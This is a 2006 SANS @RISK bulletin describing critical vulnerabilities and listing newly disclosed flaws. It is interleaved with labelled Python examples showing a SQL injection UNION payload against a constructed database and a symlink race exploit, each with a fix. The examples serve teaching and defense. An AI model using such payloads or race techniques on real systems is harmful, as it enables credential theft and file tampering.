
@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 26
July 3, 2006

A security product, PatchLink Update Server, allows remote exploitation. Apple iTunes has another security problem. And Apple Mac OS X users should install the new cumulative patch very soon.

Researchers also disclosed another 55 cross-site scripting, SQL injection and other web application vulnerabilities this week. Give your web programmers a chance to learn how to make their applications secure with a secure web programming course in Washington, Las Vegas or at your own site: http://www.sans.org/training/description.php?tid=394

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                                   # of Updates & Vulnerabilities
    Windows                                    1 (#14)
    Other Microsoft Products                   1 (#8)
    Third Party Windows Apps                   6 (#9, #12)
    Mac OS                                     1 (#6)
    Linux                                      3
    Unix                                       1 (#11)
    Novell                                     1
    Cross Platform                             9 (#1, #2, #3, #4, #5, #7)
    Web Application - Cross Site Scripting     22
    Web Application - SQL Injection            9
    Web Application                            24
    Network Device                             1 (#10, #13)

****************** Summer Security Training Extravaganza ****************

Over the next two months, you may attend one or more of 50 SANS courses in 20 cities on four continents. And if you cannot make those events, because of travel restrictions, you may attend live SANS courses with the best teachers in the world, without leaving your home. You can even take SANS courses online at your own schedule. Attendance at SANS educational events is experiencing the largest growth spurt in half a decade. Pick your class and register early to get a seat. http://www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
Unix
Novell
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

**************** SANS Network Security 2006 - Las Vegas******************

SANS Network Security 2006, October 1-9, 2006 is at Caesar's Palace in Las Vegas. Thirty-seven immersion tracks and short courses plus a big security product exposition. Further information: http://www.sans.org/ns2006/

"Very intense. I have never been to a conference where we received so much information and so much more to learn post-conference." - -Paul Abels, UPS

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) CRITICAL: PatchLink Update Server Multiple Vulnerabilities
  • Affected:
    • PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
    • Novell ZENworks Patch Management 6.2 SR1
  • Description: PatchLink Update Server is a popular patch management solution for enterprises. It contains several vulnerabilities in its ASP scripts. (a) Failure to properly sanitize the "agentid" parameter to the "checkprofile.asp" script allows unauthenticated attackers to execute arbitrary SQL statements against the internal database with DBO privileges. (b) Failure to properly process user-supplied credentials in the "proxyreg.asp" script allows unauthenticated users to proxy requests through the PatchLink server. (c) Failure to properly process user-supplied credentials to the "nwupload.asp" script allows unauthenticated attackers to upload files to the server's filesystem and overwrite any existing file. Because the upload flaw lets an attacker replace legitimate patches with malicious files, these flaws can be used to compromise every system that downloads its patches from the PatchLink server. Proof-of-concept exploits for all these vulnerabilities have been publicly posted.

  • Status: PatchLink confirmed, updates available.

  • References:
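The "agentid" flaw above is a textbook SQL injection: the parameter is spliced into query text. The following is an added example, not PatchLink's code, that reconstructs the pattern against a constructed SQLite schema (the table names, columns and data are assumptions) and shows the parameterized form that closes the hole.

```python
"""Added example (not PatchLink's code): how an unsanitized request
parameter such as "agentid" turns a profile lookup into arbitrary SQL,
beside the parameterized query that fixes it. Schema and data are
constructed stand-ins for the patch server's internal database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed schema: an agents table the lookup is meant to read and an
    # admins table it is not.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE agents (agentid TEXT PRIMARY KEY, hostname TEXT, profile TEXT);
        INSERT INTO agents VALUES ('A-1001', 'ws01', 'workstation');
        INSERT INTO agents VALUES ('A-1002', 'db01', 'database-server');
        CREATE TABLE admins (username TEXT, password_hash TEXT);
        INSERT INTO admins VALUES ('patchadmin', '0123456789abcdef');
        """
    )
    return db


def lookup_profile_vulnerable(db: sqlite3.Connection, agentid: str) -> list:
    # The pattern behind the flaw: the parameter is pasted into the query
    # text, so a quote character ends the literal and the rest is SQL.
    sql = "SELECT hostname, profile FROM agents WHERE agentid = '" + agentid + "'"
    return db.execute(sql).fetchall()


def lookup_profile_fixed(db: sqlite3.Connection, agentid: str) -> list:
    # Parameter binding: the driver passes agentid as data, never as SQL text,
    # so the same payload is just a key that matches no row.
    sql = "SELECT hostname, profile FROM agents WHERE agentid = ?"
    return db.execute(sql, (agentid,)).fetchall()


# Constructed attacker input: closes the literal, appends a UNION that reads
# a different table, and comments out the trailing quote.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM admins -- "


def demo() -> tuple:
    # Returns what each implementation hands back for the same payload.
    db = make_db()
    leaked = lookup_profile_vulnerable(db, UNION_PAYLOAD)
    safe = lookup_profile_fixed(db, UNION_PAYLOAD)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)
    print("fixed:     ", safe)
```

The vulnerable lookup returns the admins row; the fixed one returns nothing. Whether the attacker reads, writes or runs stored procedures after the injection point depends only on the database account's privileges, which is why the DBO privileges noted above make this critical.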
  • (3) HIGH: LibPNG Chunk Processing Buffer Overflow
  • Affected:
    • LibPNG versions 1.2.11 and prior
  • Description: LibPNG, a popular library for processing PNG (Portable Network Graphics) images, is installed by default on most Linux, UNIX and BSD systems and on Mac OS X; certain applications also install it on Windows. The library contains a buffer overflow that can be triggered by a specially crafted PNG image "chunk". An attacker who can deliver a malformed PNG image through any application that renders it (web browser, email client, IM) can exploit the overflow to execute arbitrary code with the privileges of the current user. Since LibPNG is open source, the technical details of the flaw can be recovered by examining the fixed code.

  • Status: LibPNG confirmed, updates available.

  • Council Site Actions: The responding council sites using the affected software plan to install any patches that come out for OS or applications they use within regular patching intervals. One also said they don't run graphical applications that take input from the outside world on their UNIX systems.

  • References:
  • (7) MODERATE: Computer Associates Multiple Products Format String Vulnerability
  • Affected:
    • Computer Associates eTrust Antivirus, PestPatrol and Integrated Threat Management version 8.0
  • Description: Several Computer Associates antivirus products contain a format string vulnerability. The vulnerability can be triggered by a "Scan job" whose description field contains a format specifier such as %s. A remote attacker with the ability to create a scan job can exploit this flaw to execute arbitrary code on the system running the affected products. Note that clients running the AV software are at risk only from local attackers. Servers that expose the scanning engine through an HTTP interface are vulnerable remotely only if anonymous or authenticated users can submit scan job requests. The technical details for this vulnerability have been publicly posted.

  • Status: Computer Associates confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Computer Associates Vulnerability Information Center Article
Other Software
  • (9) HIGH: ArGoSoft Mail Server POP3 Remote Buffer Overflow
  • Affected:
    • ArGoSoft Mail Server Pro/Plus/FreeWare versions 1.8.x and prior
  • Description: ArGoSoft Mail Server contains an undisclosed remotely-exploitable buffer overflow. By sending specially-crafted traffic (believed to be related to the POP3 DELETE verb), an attacker could trigger this buffer overflow and execute arbitrary code with the privileges of the mail server process - often SYSTEM. Exploit code has been privately published via the Immunity Partners program, and is available to registered users of that program.

  • Status: Vendor has not confirmed, no updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Immunity Security Partner's Exploit
  • (10) HIGH: Cisco Wireless Control System Multiple Vulnerabilities
  • Affected:
    • Cisco Wireless Control System versions 3.2 and 4.0 and earlier
  • Description: Cisco Wireless Control System (WCS) is used to administer Cisco wireless devices from a centralized management point. The Cisco WCS suffers from multiple remotely-exploitable vulnerabilities. (a) Any user with access to the vulnerable system can gain access to the internal database due to a hard-coded username and password, which are easily determined. (b) A remote attacker can also read and write arbitrary files on the WCS server via the built-in TFTP server, if the server's root path contains a space character. (c) The login page of the WCS web interface does not properly sanitize user-supplied input, leaving it open to cross-site scripting attacks. (d) WCS systems ship with a default administrator username and password that neither installation nor initial login requires the administrator to change. By exploiting these vulnerabilities, any attacker with network access to the WCS system could potentially take complete control of it, or gain sensitive information about the wireless system (including encryption keys and passwords).

  • Status: Cisco confirmed, updates available.

  • Council Site Actions: Only two of the reporting council sites are using the affected software. One site has implemented the available workaround on their affected systems. The other site is still in the process of investigating their exposure level.

  • References:
  • (11) MODERATE: Hashcash Remote Heap Buffer Overflow
  • Affected:
    • Hashcash reference implementation versions 1.20 and prior
  • Description: Hashcash is a system for combating unsolicited email ("spam") by requiring senders to perform an easily-verified but expensive-to-compute hash operation. This incurs a cost (in time) for senders, making it more difficult for them to send out mass emails. The reference Hashcash implementation, available on multiple platforms, suffers from a remotely-exploitable buffer overflow. By sending a specially-crafted Hashcash string to a vulnerable server, an attacker could exploit this overflow and execute arbitrary code with the privileges of the mail verification system - often root. Note that simply sending an email to a vulnerable server would be sufficient to trigger this overflow. Since this project is open source, technical details for this vulnerability are easily available.

  • Status: Hashcash confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Hashcash Change Log (includes vulnerability announcement)
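To make the cost asymmetry above concrete, here is an added example (not the Hashcash project's code) that mints and verifies a version-1 Hashcash stamp: the sender loops over a counter until the SHA-1 of the stamp has the required number of leading zero bits, while the verifier does one hash plus field checks. The verifier also bounds the length of the untrusted stamp before parsing it, which is the kind of check whose absence turns a mail-side verifier into an overflow target; the 256-byte limit is an assumption chosen for the example.

```python
"""Added example, not the Hashcash project's code: minting and verifying
a version-1 Hashcash stamp (1:bits:date:resource:ext:rand:counter), with
an input-length bound on the attacker-supplied stamp before it is parsed."""
import hashlib
import time

MAX_STAMP_LEN = 256  # assumption: bound untrusted input before parsing it


def leading_zero_bits(digest: bytes) -> int:
    # Zero bits from the most significant end of a 160-bit SHA-1 digest.
    return 160 - int.from_bytes(digest, "big").bit_length()


def mint(resource: str, bits: int, date: str = None, rand: str = "c0ffee") -> str:
    # Sender's side: increment the counter until SHA-1(stamp) starts with at
    # least `bits` zero bits. Expected work is about 2**bits hashes.
    date = date or time.strftime("%y%m%d")
    counter = 0
    while True:
        stamp = f"1:{bits}:{date}:{resource}::{rand}:{counter}"
        if leading_zero_bits(hashlib.sha1(stamp.encode()).digest()) >= bits:
            return stamp
        counter += 1


def verify(stamp: str, resource: str, min_bits: int) -> bool:
    # Receiver's side: one SHA-1 and a handful of field checks.
    if len(stamp) > MAX_STAMP_LEN:
        return False  # refuse to parse oversized input at all
    fields = stamp.split(":")
    if len(fields) != 7 or fields[0] != "1":
        return False
    try:
        claimed_bits = int(fields[1])
    except ValueError:
        return False
    if claimed_bits < min_bits or fields[3] != resource:
        return False  # too cheap, or minted for someone else's address
    return leading_zero_bits(hashlib.sha1(stamp.encode()).digest()) >= claimed_bits


if __name__ == "__main__":
    stamp = mint("alice@example.org", 12)
    print(stamp, verify(stamp, "alice@example.org", 12))
```

A production verifier additionally checks that the date field is recent and records seen stamps so a valid one cannot be reused (a double-spend database); both are omitted here to keep the example to the hashing itself.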
  • (12) MODERATE: Dxmsoft XM Easy Personal FTP Server Buffer Overflow
  • Affected:
    • XM Easy Personal FTP Server version 5.0.1 and prior
  • Description: XM Easy Personal FTP Server is a commercial FTP server for Microsoft Windows designed for personal use (widely installed in China). The server contains a buffer overflow that can be triggered by submitting an input string longer than 8000 characters. An unauthenticated attacker can execute arbitrary code with the privileges of the FTP server process, potentially SYSTEM. Proof-of-concept code for this vulnerability has been posted.

  • Status: Dxmsoft has not confirmed, no updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References: Proof-of-Concept by Jerome Athias
  • (13) MODERATE: Cisco Wireless Access Point Authentication Bypass
  • Affected:
    • Cisco Wireless Access Points/Bridge running IOS versions 12.3(8)JA or 12.3(8)JA1
  • Description: This vulnerability in the Cisco Wireless Access Point's web interface allows a remote attacker to take complete control of an affected Access Point. The flaw occurs when the Access Point's authentication method is changed from "Global Password" (the default) to "Local User List Only". After this change the web interface no longer performs any authentication check, so anyone who can reach it can administer the device.

  • Status: Cisco confirmed, updates available.

  • References:
Exploit Code
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 26, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5057 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 06.26.1 - CVE: CVE-2006-328
  • Platform: Windows
  • Title: Internet Explorer OuterHTML Redirection Handling Information Disclosure
  • Description: Microsoft Internet Explorer is susceptible to an information disclosure vulnerability. This issue is due to a failure of the application to properly enforce cross-domain policies. Microsoft Internet Explorer version 6.0 on Windows XP SP2 is vulnerable to this issue.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047398.html

  • 06.26.2 - CVE: CVE-2006-3250
  • Platform: Other Microsoft Products
  • Title: Windows Live Messenger Contact List Processing Remote Heap Overflow
  • Description: Microsoft Windows Live Messenger is an instant messaging client. It is vulnerable to a remote heap overflow issue when the application processes a malicious contact list (.ctt) file. Windows Live Messenger version 8.0 is vulnerable.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047365.html

  • 06.26.3 - CVE: CVE-2006-3277
  • Platform: Third Party Windows Apps
  • Title: MailEnable SMTP HELO Command Remote Denial of Service
  • Description: MailEnable is a commercially available mail server. It is prone to an unspecified remote denial of service vulnerability. All current versions are affected.
  • Ref: http://www.mailenable.com/hotfix/default.asp

  • 06.26.4 - CVE: CVE-2006-2226
  • Platform: Third Party Windows Apps
  • Title: XM Easy Personal FTP Server Remote Denial of Service
  • Description: XM Easy Personal FTP Server is susceptible to a remote denial of service vulnerability. This issue presents itself when the affected application receives excessive data in an FTP PORT command. XM Easy Personal FTP Server version 5.0.1 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/18632

  • 06.26.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Lanap BotDetect CAPTCHA ASP.NET Bypass Weakness
  • Description: Lanap BotDetect allows developers to include CAPTCHA (completely automated public Turing test to tell computers and humans apart) mechanisms in web applications. The software stores a UUID and a hash value for CAPTCHAs in the ViewState of pages. By replaying the ViewState of known CAPTCHAs in future requests, attackers may bypass the mechanism. BotDetect CAPTCHA ASP.NET versions prior to 1.5.4.0 are affected.
  • Ref: http://www.securityfocus.com/bid/18315
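The weakness above is a replay: if the only thing the server checks is state the client carried back, a (state, answer) pair that passed once passes forever. The following is an added example, not BotDetect's code, contrasting a stateless check modelled on the UUID-plus-hash-in-ViewState design with a server-side store that issues each challenge id once and consumes it on first use. The HMAC key and answers are constructed for the example.

```python
"""Added example, not BotDetect's code: a stateless CAPTCHA check that can
be replayed (client holds id + keyed hash of the answer) beside a one-time
server-side verifier that rejects the replay."""
import hashlib
import hmac
import secrets

SERVER_KEY = b"constructed-demo-key"  # assumption: per-deployment secret


def issue_challenge(answer: str) -> dict:
    # Both designs hand the client a challenge id and an HMAC binding the
    # id to the expected answer (the keyed hash plays the ViewState role).
    cid = secrets.token_hex(16)
    tag = hmac.new(SERVER_KEY, cid.encode() + answer.encode(), hashlib.sha256).hexdigest()
    return {"id": cid, "tag": tag}


def verify_stateless(state: dict, answer: str) -> bool:
    # Vulnerable pattern: the server keeps nothing between requests, so it
    # cannot tell a first submission from the hundredth replay of it.
    expected = hmac.new(SERVER_KEY, state["id"].encode() + answer.encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, state["tag"])


class OneTimeVerifier:
    # Hardened pattern: remember every issued id and consume it on the first
    # verification attempt, right or wrong. A replay finds the id gone.
    def __init__(self) -> None:
        self._outstanding = set()

    def issue(self, answer: str) -> dict:
        state = issue_challenge(answer)
        self._outstanding.add(state["id"])
        return state

    def verify(self, state: dict, answer: str) -> bool:
        cid = state.get("id")
        if cid not in self._outstanding:
            return False  # unknown, expired or already used
        self._outstanding.discard(cid)  # consume before checking the answer
        return verify_stateless(state, answer)


if __name__ == "__main__":
    st = issue_challenge("k7pq2")
    print("stateless, replayed:", verify_stateless(st, "k7pq2"), verify_stateless(st, "k7pq2"))
    v = OneTimeVerifier()
    st2 = v.issue("m3x9")
    print("one-time, replayed: ", v.verify(st2, "m3x9"), v.verify(st2, "m3x9"))
```

Consuming the id even on a wrong answer is deliberate: it denies a bot unlimited guesses against a single challenge. In a multi-server deployment the set would live in a shared store with an expiry, but the logic is the same.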

  • 06.26.6 - CVE: CVE-2006-2310
  • Platform: Third Party Windows Apps
  • Title: BlueDragon Server .CFM Files Denial of Service
  • Description: BlueDragon is a ColdFusion Markup Language (CFML) server. It is prone to a remote denial of service issue due to the application's failure to efficiently handle malformed GET requests for ".cfm" and ".cfml" files. This issue affects version 6.2.1.286.
  • Ref: http://secunia.com/secunia_research/2006-18/advisory/

  • 06.26.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ArGoSoft Mail Server POP3 Server Unspecified Remote Buffer Overflow
  • Description: The ArGoSoft Mail Server POP3 service is susceptible to a remote buffer overflow vulnerability. This issue allows remote attackers to execute arbitrary machine code in the context of the affected service. Visit the reference link for more details.
  • Ref: http://www.securityfocus.com/bid/18668

  • 06.26.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: XM Easy Personal FTP Server Buffer Overflow
  • Description: XM Easy Personal FTP Server is affected by a buffer overflow issue which presents itself when an attacker connects to the ftp server and issues an overly large sequence of "A%n" characters. All current versions are affected.
  • Ref: http://www.packetstormsecurity.org/0606-exploits/xmepftp.txt

  • 06.26.9 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Mac OS X Multiple Security Vulnerabilities
  • Description: Mac OS X is prone to multiple security vulnerabilities. The issues include information disclosure, buffer overflow, format string and denial of service attacks. Apple has released Mac OS X version 10.4.7 to address these issues.
  • Ref: http://docs.info.apple.com/article.html?artnum=61798

  • 06.26.10 - CVE: CVE-2006-3242
  • Platform: Linux
  • Title: Mutt BROWSE_GET_NAMESPACE IMAP Namespace Processing Buffer Overflow
  • Description: Mutt is an email client. It is vulnerable to a remote buffer overflow issue when handling an excessive namespace value from a malicious IMAP server. Mutt versions 1.4.2.1 and earlier are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2006/2522

  • 06.26.11 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel IBM S/390 strnlen_user Local Vulnerability
  • Description: The Linux kernel on IBM S/390 platforms is prone to a local vulnerability due to a flaw in the "strnlen_user()" kernel function. The direct impact of exploiting this issue is currently unknown. Linux kernel versions prior to 2.6.16 running on the IBM S/390 platform are affected.
  • Ref: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16

  • 06.26.12 - CVE: Not Available
  • Platform: Linux
  • Title: libpng Graphics Library Chunk Error Processing Buffer Overflow
  • Description: libpng is the official Portable Network Graphics (PNG) reference library. It is vulnerable to a buffer overflow issue when handling malformed PNG files. libpng3 version 1.2.12 is not vulnerable.
  • Ref: http://www.securityfocus.com/bid/18698/info

  • 06.26.13 - CVE: Not Available
  • Platform: Unix
  • Title: EnergyMech CTCP Notice Denial of Service
  • Description: EnergyMech is an IRC bot. It is affected by a denial of service issue because the application does not properly handle empty CTCP NOTICEs correctly. EnergyMech versions prior to 3.0.2 are affected.
  • Ref: http://www.securityfocus.com/bid/18664

  • 06.26.14 - CVE: CVE-2006-3268
  • Platform: Novell
  • Title: Novell Groupwise Unauthorized Email Access
  • Description: Novell Groupwise is an enterprise collaboration suite. The API has an unspecified issue that allows a bypass of security controls. Novell Groupwise versions 7.0 and earlier are vulnerable.
  • Ref: http://secunia.com/advisories/20888/

  • 06.26.15 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BitchX BX_Do_Hook Remote Denial of Service
  • Description: BitchX is an open source IRC client. It is vulnerable to a remote denial of service issue when handling excessive data from malicious IRC servers. BitchX version 1.1-final is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18634

  • 06.26.16 - CVE: CVE-2006-3225
  • Platform: Cross Platform
  • Title: Sun ONE and Sun Java System Application Server Unspecified Cross-Site Scripting
  • Description: Sun ONE and Sun Java System applications are prone to an unspecified cross-site scripting vulnerability. This issue is due to a failure in the applications to properly sanitize user-supplied input. Visit the reference link for more details.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102479-1

  • 06.26.17 - CVE: CVE-2006-3252
  • Platform: Cross Platform
  • Title: Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow
  • Description: PrivateWire is a security toolbox. It is exposed to a buffer overflow issue due to improper handling of GET requests during online registration of user credentials. PrivateWire gateway versions 3.7 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/438329

  • 06.26.18 - CVE: CAN-2006-0119
  • Platform: Cross Platform
  • Title: Lotus Domino SMTP Meeting Request Remote Denial of Service
  • Description: Lotus Domino is affected by a remote denial of service when the application receives malformed meeting requests via its SMTP service. These malicious vCal email messages are sent to the routing server "NROUTER.EXE" to be handled. When the routing server attempts to process the malicious request all available CPU resources are consumed indefinitely. Lotus Domino versions prior to 6.5.4 FP1, 6.5.5 and 7.0 are affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21211952

  • 06.26.19 - CVE: CVE-2006-2436
  • Platform: Cross Platform
  • Title: IBM WebSphere Application Server Multiple Remote Vulnerabilities
  • Description: IBM WebSphere Application Server is vulnerable to multiple remote issues due to insufficient sanitization of user-supplied input to various scripts. IBM WebSphere Application Server version 5.1.1 Cumulative Fix 11 resolves the issues.
  • Ref: http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24012429

  • 06.26.20 - CVE: CVE-2006-3118
  • Platform: Cross Platform
  • Title: SF Spread Insecure Socket File Creation Denial of Service
  • Description: Spread is a messaging daemon. The problem occurs when Spread creates the temporary file "/tmp/<port>". Before creating the socket file, Spread checks whether the file exists and, if it does, deletes it. The window between that check-and-delete and the subsequent creation is a race condition that a local attacker can exploit.
  • Ref: http://www.securityfocus.com/bid/18675
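The check-then-create sequence above is a classic time-of-check/time-of-use race in a world-writable directory. The following is an added example, not Spread's code, that reproduces the pattern on a regular file (a simplification of the socket file) with a hook standing in for an attacker who wins the race, beside the fix of creating the file atomically inside a fresh private directory. All paths are constructed in a scratch directory; the example assumes a POSIX system.

```python
"""Added example, not Spread's code: the exists?/remove/create race on a
predictable path, with a test hook in place of the attacker, beside the
fix (private mkdtemp directory plus O_CREAT|O_EXCL). POSIX only."""
import os
import tempfile


def create_unsafe(path: str, between_check_and_create=None) -> None:
    # Vulnerable pattern: exists? -> remove -> create. An attacker who wins
    # the race drops a symlink into the gap; the create then follows the
    # symlink and clobbers whatever it points at.
    if os.path.exists(path):
        os.remove(path)
    if between_check_and_create:
        between_check_and_create()  # test hook: the attacker's window
    with open(path, "w") as f:  # follows symlinks
        f.write("spread daemon listening\n")


def create_safe(basename: str) -> str:
    # Fix: a fresh 0700 directory with an unpredictable name (mkdtemp is
    # atomic and exclusive), then O_CREAT|O_EXCL so the create fails rather
    # than following anything an attacker managed to plant.
    private_dir = tempfile.mkdtemp(prefix="spread-")
    path = os.path.join(private_dir, basename)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write("spread daemon listening\n")
    return path


def demo_race() -> tuple:
    # Constructed scenario: a victim file, a predictable "/tmp/<port>"-style
    # path, and an attacker that plants a symlink inside the race window.
    scratch = tempfile.mkdtemp(prefix="demo-")
    victim = os.path.join(scratch, "victim.conf")
    with open(victim, "w") as f:
        f.write("original contents\n")
    predictable = os.path.join(scratch, "4803")  # stands in for /tmp/4803

    def attacker() -> None:
        os.symlink(victim, predictable)

    create_unsafe(predictable, between_check_and_create=attacker)
    with open(victim) as f:
        clobbered = f.read()  # the daemon's write landed on the victim

    safe_path = create_safe("4803")
    dir_mode = oct(os.stat(os.path.dirname(safe_path)).st_mode & 0o777)
    return clobbered, os.path.islink(safe_path), dir_mode


if __name__ == "__main__":
    clobbered, is_link, dir_mode = demo_race()
    print("victim now contains:", repr(clobbered))
    print("safe path is a symlink:", is_link, "| private dir mode:", dir_mode)
```

The private directory removes the attacker's ability to predict or pre-create the path, and O_EXCL makes the create itself fail-closed if the path somehow exists. Deleting the stale file first, as the vulnerable code does, buys nothing: the attacker simply re-plants after the delete.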

  • 06.26.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: F-Secure Multiple Products Scan Evasion Vulnerabilities
  • Description: Multiple products by F-Secure are prone to scan evasion issues. Some products do not properly scan files with specially crafted names. Others stop scanning files on removable media when the "Scan network drives" option has been disabled.
  • Ref: http://www.f-secure.com/security/fsc-2006-4.shtml

  • 06.26.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco Wireless Control System Multiple Security Vulnerabilities
  • Description: Wireless Control System is a centralized, systems-level application for managing and controlling lightweight access points and wireless LAN controllers for the Cisco Unified Wireless Network. It is prone to multiple security vulnerabilities including authorization bypass, arbitrary file access, cross-site scripting and information disclosure. Cisco Wireless Control System Software versions 4.0 and 3.2 are affected.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060628-wcs.shtml

  • 06.26.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NeoEngine Format String And Denial of Service Vulnerabilities
  • Description: NeoEngine is affected by multiple format string and denial of service issues. A successful attack may crash the application or lead to arbitrary code execution. All current versions are affected.
  • Ref: http://aluigi.altervista.org/adv/neoenginex-adv.txt

  • 06.26.24 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: ADOdb Tmssql.PHP Cross-Site Scripting
  • Description: ADOdb is a database abstraction library for PHP. Insufficient sanitization of the "do" parameter in the "tmssql.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18638

  • 06.26.25 - CVE: CVE-2006-3305
  • Platform: Web Application - Cross Site Scripting
  • Title: UebiMiau Multiple Cross-Site Scripting Vulnerabilities
  • Description: UebiMiau is a webmail application. It is exposed to multiple cross-site scripting issues due to insufficient sanitization of HTML and script code from URI input. UebiMiau versions 2.7.10 and 2.7.2 are affected.
  • Ref: http://www.securityfocus.com/bid/18643

  • 06.26.26 - CVE: CVE-2006-3240
  • Platform: Web Application - Cross Site Scripting
  • Title: dotProject UI.Class.PHP Cross-Site Scripting
  • Description: dotProject is a web-based project management application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "login" parameter of the "ui.class.php" script. dotProject versions 2.0.3 and earlier are vulnerable.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=427236

  • 06.26.27 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GL-SH Deaf Forum Multiple Cross-Site Scripting Vulnerabilities
  • Description: GL-SH Deaf Forum is a web-based forum application. Insufficient sanitization of the "sort", "page", "search" and "action" parameters of the "show.php" script exposes the application to multiple cross-site scripting issues.
  • Ref: http://www.securityfocus.com/bid/18651

  • 06.26.28 - CVE: CVE-2006-3265
  • Platform: Web Application - Cross Site Scripting
  • Title: Qdig Index.PHP Multiple Cross-Site Scripting Vulnerabilities
  • Description: Quick Digital Image Gallery (Qdig) is a web-based image gallery. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "pre_gallery" and "post_gallery" parameters of the "index.php" script. Quick Digital Image Gallery versions 1.2.9.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18653

  • 06.26.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Winged Gallery Thumb.PHP Cross-Site Scripting
  • Description: Winged Gallery is a web-based image gallery application. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied input in the "image" parameter of the "thumb.php" script. Winged Gallery version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18629

  • 06.26.30 - CVE: CVE-2006-3241
  • Platform: Web Application - Cross Site Scripting
  • Title: XennoBB Messages.PHP Cross-site Scripting
  • Description: XennoBB is a web-based bulletin board system. It is prone to a cross-site scripting vulnerability because it fails to sanitize HTML and script code in the "tid" parameter of the "messages.php" script. XennoBB version 1.0.5 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18652

  • 06.26.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MyMail Login.PHP Cross-Site Scripting
  • Description: MyMail is a mailing list script. Insufficient sanitization of the "error" parameter of the "login.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438331

  • 06.26.32 - CVE: CVE-2006-3301
  • Platform: Web Application - Cross Site Scripting
  • Title: phpQLAdmin Multiple Cross-Site Scripting Vulnerabilities
  • Description: phpQLAdmin is an administration tool for the QmailLDAP user database. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. phpQLAdmin version 2.2.7 is vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/phpqladmin-vuln.html

  • 06.26.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Usenet Index.PHP Cross-Site Scripting
  • Description: Usenet is a web-based newsgroup application. Insufficient sanitization of the "group" parameter of the "index.php" script exposes the application to a cross-site scripting issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438443

  • 06.26.34 - CVE: CVE-2006-3245
  • Platform: Web Application - Cross Site Scripting
  • Title: MVN Forum Activatemember Cross-Site Scripting
